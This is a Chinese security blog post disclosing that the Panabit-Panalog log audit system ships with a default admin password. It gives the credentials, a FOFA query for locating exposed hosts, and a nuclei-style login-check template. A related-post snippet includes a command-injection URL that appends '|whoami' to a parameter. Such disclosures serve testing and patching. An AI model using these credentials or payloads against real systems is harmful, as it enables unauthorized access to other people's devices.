Panabit-Panalog 弱口令漏洞

最新推荐文章于 2024-11-13 15:50:44 发布
最新推荐文章于 2024-11-13 15:50:44 发布
阅读量1k 收藏 7
点赞数 7
CC 4.0 BY-SA版权
分类专栏: 漏洞POC 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45936921/article/details/135307147
这篇文章揭露了Panabit-Panalog日志审计系统存在的弱口令漏洞,允许直接访问后台,建议用户关注厂商修复并及时升级。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

漏洞描述

Panabit-Panalog日志系统存在弱口令,可直接进入后台系统界面。

漏洞影响

  • Panabit-Panalog日志审计系统

网络测绘

  • FOFA:product="Panabit-Panalog"

漏洞复现

弱口令:admin/panabit

随机选取一个漏洞URL进入后台

漏洞POC

id: Panabit-Panalog-default-password

info:
  name: Panabit-Panalog日志系统存在弱口令
  author: linfeng7z
  severity: critical
  description: Panabit-Panalog日志系统存在弱口令,可直接进入后台系统界面
  tags: panabit,panalog,default-password
  metadata:
    fofa-qeury: product="Panabit-Panalog"
    veified: true

requests:
  - raw:
      - |
        POST /login.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        
        user=05110f8b023d9f2ca362d32a4e371923&mypass=f09052b749115479ca208bad0873b4b8&useldap=0

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '\u7528\u6237\u4e0d\u5b58\u5728\u6216\u5bc6\u7801\u9519\u8bef'
        negative: true

      - type: dsl
        dsl:
          - "status_code == 200"

修复建议

请关注厂商的修复版本,并及时更新到最新版本。

Panabit Panalog后台命令执行
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
07-18 580
也许人生仅有那么一两个辉煌的瞬间——甚至一生都可能在平淡无奇中度过……不过,细想过来,每个人的生活同样也是一个世界。即使最平凡的人,也得要为他那个世界的存在而战斗。这个意义上说,在这些平凡的世界里,也没有一天是平静的。
panabit日志审计系统sprog_upstatus接口处SQL注入漏洞复现 [附POC]
薛定谔嘚喵博客
08-01 480
Panabit日志审计系统接口sprog_upstatus存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息等)。
Panabit-Panalog ipgrp_handle SQL注入漏洞
qq_45936921的博客
01-03 909
Panabit-Panalog日志系统后台 ipgrp_handle.php接口存在SQL注入漏洞,攻击者可以通过此漏洞获取数据库敏感信息,用户名密码等凭据,进一步利用可获取服务器权限
Panabit上网行为管理安装及Panalog日志对接
最新发布
weixin_68029979的博客
11-13 3803
由于近期在做实训需要用到Panabit上网管理软件,在安装过程中遇到了许多问题。而且在网络上,并没有找到相关的解决方法,因此书写该篇文章以记录过程。。Panabit的连接方式:作为进行连接。要求:内网能连接互联网,设置策略等。
Panabit的日志功能实现
06-01
流控 ,Panabit,流控大师的日志功能,能完整记录上网行为。
RabbitMQ【部署 01】一篇学会RabbitMQ服务依赖的下载安装及简单使用(首次登录 User can only log in via localhost 问题处理)(1)
2301_77121488的博客
05-08 1151
也可以直接安装rabbitmq-server从报错信息里获取需要的版本,由于是同一个网站,下载的方式是一样的,这次也是直接下载安装文件。,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~此时服务已经可以使用了,但是,默认情况下,RabbitMQ是没有安装WEB端插件的,需要手动积获才可以生效。点击下载,可以进行联网下载安装也可以直接进行下载,本次选择直接下载安装文件。因篇幅有限,仅展示部分资料。还有大家最喜欢的黑客技术。
U盘启动制作工具包,安装PanabitPanaLog, iXCache
04-08
在IT行业中,U盘启动盘制作工具包是一种实用的软件解决方案,它允许用户将系统安装程序或特定的应用软件,如PanabitPanaLog和iXCache,移植到U盘中,以便在需要时通过U盘对计算机进行快速部署或维护。这个压缩包...
Panalog 日志审计系统 sprog_upstatus.php SQL 注入漏洞复现(XVE-2024-5232)
0xSec
08-03 519
Panabit /Maintain/sprog_upstatus.php接口处的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。
漏洞复现】​Panalog-日志审计系统-sessiptbl-RCE
知黑而守白
02-20 205
Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。Panalog日志审计系统 sessiptbl 接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。
漏洞复现】Panalog-日志审计系统-libres_syn_delete-rce
知黑而守白
02-20 171
Panalog是一款日志审计系统,方便用户统一集中监控、管理在网的海量设备。​​​​​​​Panalog日志审计系统 libres_syn_delete 接口处存在远程命令执行漏洞,攻击者可执行任意命令,接管服务器权限。
panalog安装手册
06-09
panalog安装手册
panalog 日志管理系统
12-23
panalog 配合panabit 的日志管理 查询 记录用户行为日志系统 满足网安的要求是运营商必选的系统
记录一次简单弱口令爆破登录
aihiglh的博客
06-15 1080
弱鸡高中生大战弱口令密码
panabit安装和默认密码
热门推荐
qq_44753564的博客
10-08 1万+
panabit安装和默认密码 我使用的版本 1、在VMware里新建一个虚拟机 2、选择 free BFD 3、给虚拟机命名 5、给虚拟机配置如下 6、 下面的地址按照自己的ip来设置 7、登录界面 啊啊在这里卡了好久,看肖哥视频说登录账号和密码是 root 和 root ,一直以为是我操作有问题,重新进了n遍。 后面跑论坛才搜索到,帖子地址: http://forum.panabit.com/thread-22321-2-1.html panabit或 free bfd 登录密码 login
linux导出日志关键字数据_Linux版本的Panalog大数据日志分析系统正式公测
weixin_39856208的博客
11-10 1000
Panalog的Linux版本正式公测大家好,相信了解派网的小伙伴们最近已经发现了,自Panabit智能应用网关软件的Linux版本发布后,在部署上增加了非常大的灵活性和适用性。而今天给大家带来的是,Panalog的Linux版本,为了让大家能够尽快上手体验,下面直接介绍Linux版本的详细部署步骤。由于是公测,为了方便大家反馈问题,请小伙伴们扫描文章最后的微信二维码加群进行问题的反馈...
上网行为管理(使用软件Panabit
一个80后IT之路
12-30 7595

 前段时间,思科的一位朋友告诉我一个软件Panabit(http://www.panabit.com/),听说这个软件有上网行为管理的功能,可以从网络应用层管理现有的大多数软件,保证有限的网络带宽资源得到合理的利用和分配。   1、安装和部署Panabit: (1)Panabit流控部署位置: (2)Panabit硬件配置        ...
Panabit修改Liunx版本后台root密码
weixin_63738327的博客
06-21 1933
mount -o remount,rw / 回车。修改root账号密码,重复输入一个不少于8位的密码。exec /sbin/init(退出单用户),回车。设备接键盘显示器,加电开机进入启动界面,出现下面这个提示符就表示进入了单用户。加载完成,通过修改之后的密码登录。,少于8位会有弱密码提示。组合键进入单用户模式。
Panabit存在命令执行漏洞
weixin_51387754的博客
11-04 3518
漏洞简介 Panabit是以DPI、DFI为基础,融合多项识别技术的一款基于应用层流量管理的流控系统。 漏洞复现 fofa语句:“panabit” && server==“nginx” https://x.x.x.x:4433/account/sy_addmount.php?username=|whoami ...
Panabit智能应用网关远程代码执行漏洞
失心少年
07-24 1815
panabit iXCache系统date_config存在命令执行漏洞,攻击者在获取Web权限的情况下,可通过构造payload进行远程命令注入,获取设备root权限
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值